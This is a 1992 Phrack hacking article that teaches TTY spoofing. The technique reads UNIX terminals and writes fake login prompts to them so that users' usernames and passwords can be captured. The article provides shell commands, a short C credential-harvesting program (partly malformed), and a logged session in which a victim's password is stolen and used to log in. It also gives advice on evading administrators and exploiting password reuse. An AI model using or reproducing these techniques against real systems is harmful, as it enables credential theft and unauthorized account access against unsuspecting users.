==Phrack Inc.==
Volume Four, Issue Forty-One, File 8 of 13
++++++++++++++++++++++++++++
+++++++ TTY SPOOFING +++++++
++++++++     BY     ++++++++
++++++++ VaxBuster +++++++++
++++++++++++++++++++++++++++
July 16, 1992
Please note that this file is ONLY to be distributed as part of Phrack,
and will NOT be distributed to any other person or magazine for release.
More detailed instructions have been provided so that the novice hacker is
able to understand them; therefore, all experienced hackers should be able to
breeze right through this without having to worry about the specific command
syntax provided.
On UNIX systems, there are many ways to obtain account names and
passwords. Some hackers prefer to swipe the password file and run programs
like Crack and Killer Cracker on them in order to get account names and
passwords. Others rely on bugs or holes in the system in order to gain root
access. Both these methods work, but what do you do if your password file is
shadowed (and it is NOT a yellow pages file!)? And what do you do if all the
holes have been patched over from years of previous hackers abusing them? Well,
I happen to have found a system where all this is true. I have even allowed
hackers to use one of my accounts to try to gain root privs, and of the 10 or
so that have tried, they have all failed. My only recourse was to find SOME
other way to get accounts on the system to maintain MY security.
TTY spoofing is often looked at as being lame, and some don't even
consider it a "hacking technique." People usually completely overlook it, and
many others don't even know about it, or know HOW to do it. I suppose I should
start out by defining the term. TTY spoofing means installing a Trojan
horse type program to sit and watch a certain tty (or several) and wait for a
user to log in. Instead of getting the normal system prompt, the program YOU
installed echoes the standard "login:" prompt, and then after they type in
their username, it prompts them for "<username> password:" and boom, you have a
new account. This can be done by a program or, in many cases, manually.
Of all the people I know, 90 percent of them scream at me saying that this
is impossible because their system doesn't allow read/write access to the tty.
When I make references to tty, I mean the physical device filename or
/dev/ttyxx where xx is either numeric, alphabetic, or alphanumeric characters
(e.g., 03, pa, p4 are all valid). Of all the systems I've been on, I've never
seen one that doesn't allow reading/writing to a LOGIN process. See, the
system doesn't change the tty to owner r/w ONLY until AFTER HIS USERNAME AND
PASSWORD HAVE BEEN VERIFIED. Console, or ttyco, is an exception where the perms
are ALWAYS -rw-------.
Now that you know WHAT tty spoofing is and the general idea behind WHY it
works, I'll start to tell you the many ways it can be done.
In order to tty spoof, you MUST have at least ONE valid account on the
system. You can obtain the account via a little social engineering, or you
could try a /who *sitename in the IRC to get nicknames and use their username
and try to hack out the password. Try looking for users in #hottub and other
st00pid channels because they are the ones who would tend to have the easy
passwords. Or use any other method that you can think of to obtain an account.
Once you have an account, the rest is the easy part. Simply create a
script in vi or emacs that redirects input from UNUSED tty's to cat. Since you
are cat's standard output, everything coming FROM the monitored tty will come
to your screen. You probably want to watch about 10 or 15 terminals. An
example script would be:
cat </dev/tty01&
cat </dev/tty02&
cat </dev/ttypa&
cat </dev/ttyp1&
Then you want to just run your script with source. Once a user walks up
to a terminal (or remotely logs in via telnet, etc.), they will try to press
return and attempt to get a login prompt. Many users will also type their
username, thinking that the system is just waiting for it. Make sure you write
down the username. After a while, they will probably start pressing control
characters, like control-d or z or whatever. Here's the problem: when CAT
encounters the ^D, it thinks that it is receiving an EOF in the file and it
thinks its job is done. You'll get something to the effect of:
[2] Exit DONE cat </dev/tty01
or
[2] Exit 1 cat:i/o error cat </dev/tty01
You want to IMMEDIATELY (if not sooner) "recat" that terminal. Once you get
that DONE signal, you now know WHAT terminal is active. You want to then type
something to the effect of 'echo -n "login:" >/dev/tty01&'. The & is important
because if the user decided to switch terminals, echo could lock up and freeze
your control on the account. If after about 10 seconds echo doesn't come back
as:
[5] Exit DONE echo -n login: >/dev/tty01
KILL the process. When you ran the echo command, the shell gave you a
processid. Just type KILL processid. If the done echo line DOES come back,
that means that it was successfully printed on the user's screen. He will then
type in his username. WRITE THIS DOWN. If you are ever in doubt that the word
on your screen is a username, type 'grep word /etc/passwd' and if a line comes
up, you know it's valid. If grep doesn't return anything, still keep it
because it might be a password. Then wait about 2 seconds, and type
'echo -n "<username> password:" >/dev/tty01&' again using the & to prevent
lockage. If that command doesn't come back in about 10 seconds, kill the
process off and you can assume that you lost the user (e.g. he moved to another
terminal). If the done echo line DOES come back, then in about 2 seconds, you
SHOULD see his password come up. If you do, write it down, and boom, you have
a new account.
This may seem like a time consuming process and a lot of work, but
if you have macros with the "cat </dev/tty" command and the
echo -n commands preset, it will be a breeze. Okay - so you say to yourself,
"I'm a lazy shit, and just want passwords to be handed to me on a silver
platter." With a little bit of work, you can do that! Below are a few lines of
C source code that can be used to automate this process. Anyone who knows C
should be able to put something together in no time.
#include <stdio.h>
FILE *fp, *fp2;
char username[10], password[10];
main()
{
fp=fopen("/dev/ttyp1", "r");
fp2=fopen("/dev/ttyp1", "w");
fprintf(fp2, "login:");
fscanf(fp, "%s", &username);
/* Put delay commands in here */
fprintf(fp2, "%s password:", username);
fscanf(fp, "%s", @password);
printf("Your new account info is %s, with password %s.", username,
password);
}
This is a VERY basic setup. One could fairly easily have the program take
arguments from the command line, like a range of tty's, and have the output
sent to a file.
Below is an actual session of manual tty spoofing. The usernames and
passwords HAVE been changed because they will probably be active when you read
this. Some c/r's and l/f's have been cut to save space. Please notice the
time between the startup and getting a new account is only seven minutes.
Using this technique does not limit the hacked passwords to dictionary
derivatives like Crack and other programs.
source mycats ; This file contains cats
; for terminals tty03 - tty10
[1] 29377
/dev/tty03: Permission denied ; All this means is that someone is logged in
; and has their mesg set to NO. Ignore it.
[1] Exit 1 cat < /dev/tty03
[2] 29378
[3] 29379
/dev/tty06: Permission denied
/dev/tty05: Permission denied
[4] Exit 1 cat < /dev/tty06
[3] Exit 1 cat < /dev/tty05
/dev/tty07: Permission denied
[3] Exit 1 cat < /dev/tty07
/dev/tty08: Permission denied
[3] Exit 1 cat < /dev/tty08
[2] + Stopped (tty input) cat < /dev/tty04 ; This was the terminal I was
; on - it's automatically
; aborted...
[3] 29383
<5:34pm><~> /dev/tty09: Permission denied
[3] Exit 1 cat < /dev/tty09
<5:34pm><~> source mycats2 ;This one contains 34 - 43
[3] 29393
[4] 29394
[5] 29395
[6] 29396
[7] 29397
[8] 29398
[9] 29399
/dev/tty36: Permission denied
/dev/tty37: Permission denied
/dev/tty38: Permission denied
/dev/tty39: Permission denied
/dev/tty40: Permission denied
/dev/tty34: Permission denied
/dev/tty35: Permission denied
[9] Exit 1 cat < /dev/tty40
[8] Exit 1 cat < /dev/tty39
[7] Exit 1 cat < /dev/tty38
[6] Exit 1 cat < /dev/tty37
[5] Exit 1 cat < /dev/tty36
[4] Exit 1 cat < /dev/tty35
[3] Exit 1 cat < /dev/tty34
[1] 29400
[3] 29401
[4] 29402
<5:34pm><~> /dev/tty41: Permission denied
[1] Exit 1 cat < /dev/tty41
/dev/tty43: Permission denied
[4] Exit 1 cat < /dev/tty43
/dev/tty42: Permission denied
[3] Exit 1 cat < /dev/tty42
<5:34pm><~> source mycats3 ;This contains p1-pa
[3] 29404
[4] 29405
[5] 29406
[6] 29407
[7] 29408
/dev/ttyp1: Permission denied
/dev/ttyp3: Permission denied
/dev/ttyp5: Permission denied
/dev/ttyp6: Permission denied
[8] Exit 1 cat < /dev/ttyp6
[7] Exit 1 cat < /dev/ttyp5
[5] Exit 1 cat < /dev/ttyp3
[3] Exit 1 cat < /dev/ttyp1
[7] 29410
[8] 29411
[9] 29412
[1] 29413
<5:34pm><~> /dev/ttyp7: Permission denied
[7] Exit 1 cat < /dev/ttyp7
/dev/ttypa: Permission denied
[1] Exit 1 cat < /dev/ttypa
<5:34pm><~> source mycats4 ;Last one is q0-qa
[1] 29426
[3] 29427
[5] 29428
[7] 29429
[10] 29430
[11] 29431
/dev/ttyq5: Permission denied
[10] Exit 1 cat < /dev/ttyq5
[12] 29432
[10] 29433
[13] 29434
[14] 29435
<5:34pm><~> who
<5:34pm><~> nnnnnnnnrlogin unx ; He thought he didn't type it right.
pigsnort ; Important! Write down ALL non-
; system sent messages!
<5:35pm><~>
grep pigsnort /etc/passwd ; Check with grep to see if it's an
; account.
<5:35pm><~> ; Didn't return anything - must be
; a password!
nnnpptst8 ; Sure looks like an account name to
nnnnn===== ; me! Write it down!
ls
[8] Done cat < /dev/ttyp8 ; Asshole pressed control-d.
; 'recat' the terminal!
<5:36pm><~> cat < /d e v/ ttyp8& ; This is the 'recat.'
[8] 29459
<5:36pm><~> cat: read error: I/O error ; Asshole is now trying all
; sorts of control characters
; sending UNIX into a fit.
[4] Exit 1 cat < /dev/ttyp2
<5:36pm><~> cat </dev/ttyp2& ; 'recat' it!
[4] 29465
<5:36pm><~>
<5:36pm><~>
[6] Done cat < /dev/ttyp4 ; Someone had to press the
; character, so this is active.
<5:36pm><~> cat </dev/ttyp4& ; 'recat' the ctrl-d.
[6] 29468
<5:36pm><~> echo -n "login:" >/dev/ttyble1 ; Try echo'ing a fake login
cat: read error: I/O error ; to the active terminal.
[6] Exit 1 cat < /dev/ttyp4
poop4d ; Here goes another password.
p4 ; Couldn't find the matching
& ; account.
[6] 29470
<5:37pm><~> cat: read error: I/O error
[4] Exit 1 cat < /dev/ttyp2
<5:37pm><~> cat </dev/ttyp2&
[4] 29489
<5:37pm><~> echo -n "login:" >/dev/ttyp2& ; Try echo'ing a fake login
; prompt again.
[15] 29490
<5:37pm><~> kill 29490 ; Login prompt didn't return
; within a few seconds so we
; kill it.
[15] Terminated echo -n login: > /dev/ttyp2
<5:37pm><~> cat </dev/tty
echo -n "login:" >/dev/ttyp4&
[15] 29491
<5:38pm><~> kill 29491
<5:38pm><~> grep pptst8 /etc/passwd ; Make sure it's an account!
pptst8:X:58479:4129:People Eater:/ucuc.edu/usr/pptst8:/bin/bash
<5:38pm><~> grep ble1 /etc/passwd ; This isn't an account...
<5:39pm><~> grep poop4d /etc/passwd ; Neither is this - probably
; a password...
<5:39pm><~> who ; See if any of the users we
; caught fell through an
; 'uncatted' terminal...
<5:39pm><~> ps -x ; View all our processes.
; DAMN glad that the cat's
PID TT STAT TIME COMMAND ; don't come up in the process
29266 04 S 0:04 -tcsh (tcsh) ; list!
29378 04 T 0:00 cat
29412 04 I 0:00 -tcsh (tcsh)
29426 04 I 0:00 -tcsh (tcsh)
29427 04 I 0:00 -tcsh (tcsh)
29428 04 I 0:00 -tcsh (tcsh)
29429 04 I 0:00 -tcsh (tcsh)
29431 04 I 0:00 -tcsh (tcsh)
29432 04 I 0:00 -tcsh (tcsh)
29433 04 I 0:00 -tcsh (tcsh)
29434 04 I 0:00 -tcsh (tcsh)
29435 04 I 0:00 -tcsh (tcsh)
29459 04 I 0:00 -tcsh (tcsh)
29470 04 D 0:00 <exiting>
29489 04 I 0:00 -tcsh (tcsh)
29491 04 D 0:00 -tcsh (tcsh)
29547 04 R 0:00 ps -x
<5:40pm><~> kill 29378 29412 29426 29427 29428 29429 29431 29432 29433 29434 29
435 29459 29470 29489 289491 ;Kill off all processes.
29470: No such process
[4] Terminated cat < /dev/ttyp2
[8] Terminated cat < /dev/ttyp8
[14] Terminated cat < /dev/ttyqa
[13] Terminated cat < /dev/ttyq9
[10] Terminated cat < /dev/ttyq8
[12] Terminated cat < /dev/ttyq7
[11] Terminated cat < /dev/ttyq6
[7] Terminated cat < /dev/ttyq4
[5] Terminated cat < /dev/ttyq3
[3] Terminated cat < /dev/ttyq2
[1] Terminated cat < /dev/ttyq1
[9] Terminated cat < /dev/ttyp9
[2] Terminated cat < /dev/tty04
<5:41pm><~>
[15] Terminated echo -n login: > /dev/ttyp4
[6] Done echo -n login: > /dev/ttyp4
<5:41pm><~> ps -x
PID TT STAT TIME COMMAND
29266 04 S 0:04 -tcsh (tcsh)
29594 04 R 0:00 ps -x
<5:41pm><~> logout
Local -011- Session 1 disconnected from UNIX1
Local> c unx ; Notice it's a different
; system but shares passwords.
Local -010- Session 1 to UNX on node MYUNX established
Welcome to ucuc.edu.
login: ble1 ; Test out all the accounts
ble1 password: [I tried poop4d] ; with all the passwords.
Login failed.
login: pptst8
pptst8 password: [I tried poop4d here too.]
Login failed.
login: pptst8
pptst8 password: [I typed pigsnort]
Authenticated via AFS Kerberos. ; BINGO! We're in!
Checking system rights for <pptst8>... login permitted.
login 1.0(2), Authen
Last login: Fri Jul 17 17:33:30 on tty11
(1) unix $ ls ; Let's see what this sucker
; has...hmm...an IRC user, eh?
Mail Mailbox News bin irc other junk private
public
(2) unix $ logout
Local -011- Session 1 disconnected from UNX
A few words of advice: Monitor the tty's when it's the busiest time of
the day, usually about 11am on a university system. Kill all your processes
before you hang up. Those processes that you run will sit on the system and
can be found by sysadmins. Also, they will tie up those tty's that you are
monitoring, which can also cause problems. Point is, you DON'T want to attract
attention to what you're doing. Don't test the accounts you get immediately.
If the victim happens to be doing a 'who' and sees two of himself, he is going
to shit. Wait until later or use a different subsystem that won't show up on
his 'who'.
Don't take over accounts. All the real user has to do is call up the office
and tell them that their password was changed. In two seconds, it'll be
changed back, plus the sysadmin will be on the lookout so you're just one step
BEHIND where you started. Once you have someone's account info, kill the cat
that is sucking the terminal so that the user can log in normally. If he
continues not to get ANYTHING, he may go and solicit some "professional" help,
and THEY might know what's going on, so let the sucker log in. Another thing:
with accounts you get, DO NOT DESTROY ANYTHING in the system, not in their
account, and nowhere else if you get higher privs. Chances are that the person
is NOT going to know
someone has obtained their password, and will have NO reason to change it.
Wait until his college term/semester ends and then monitor the file dates. If
after about a month the dates don't change, change the password and do whatever
you want to the account because he's probably done with it.
Oh and one last thing. Once you have a valid account, grep the username and
get the REAL name. Then grep the REAL name and find out all accounts on the
system that the guy owns. Chances are that he is using the same password in
multiple accounts!
Thanks go to Pointman, #hack members, and the entire current/past Phrack staff
for putting out an excellent magazine over the years.
If you need to contact me, try the IRC in #hack and the VMB world. I usually
prefer NOT to be contacted by e-mail, but if you have my address and have an
important question, go for it. I'm willing to help any beginners who need it.
Happy Hacking!
VaxBuster '92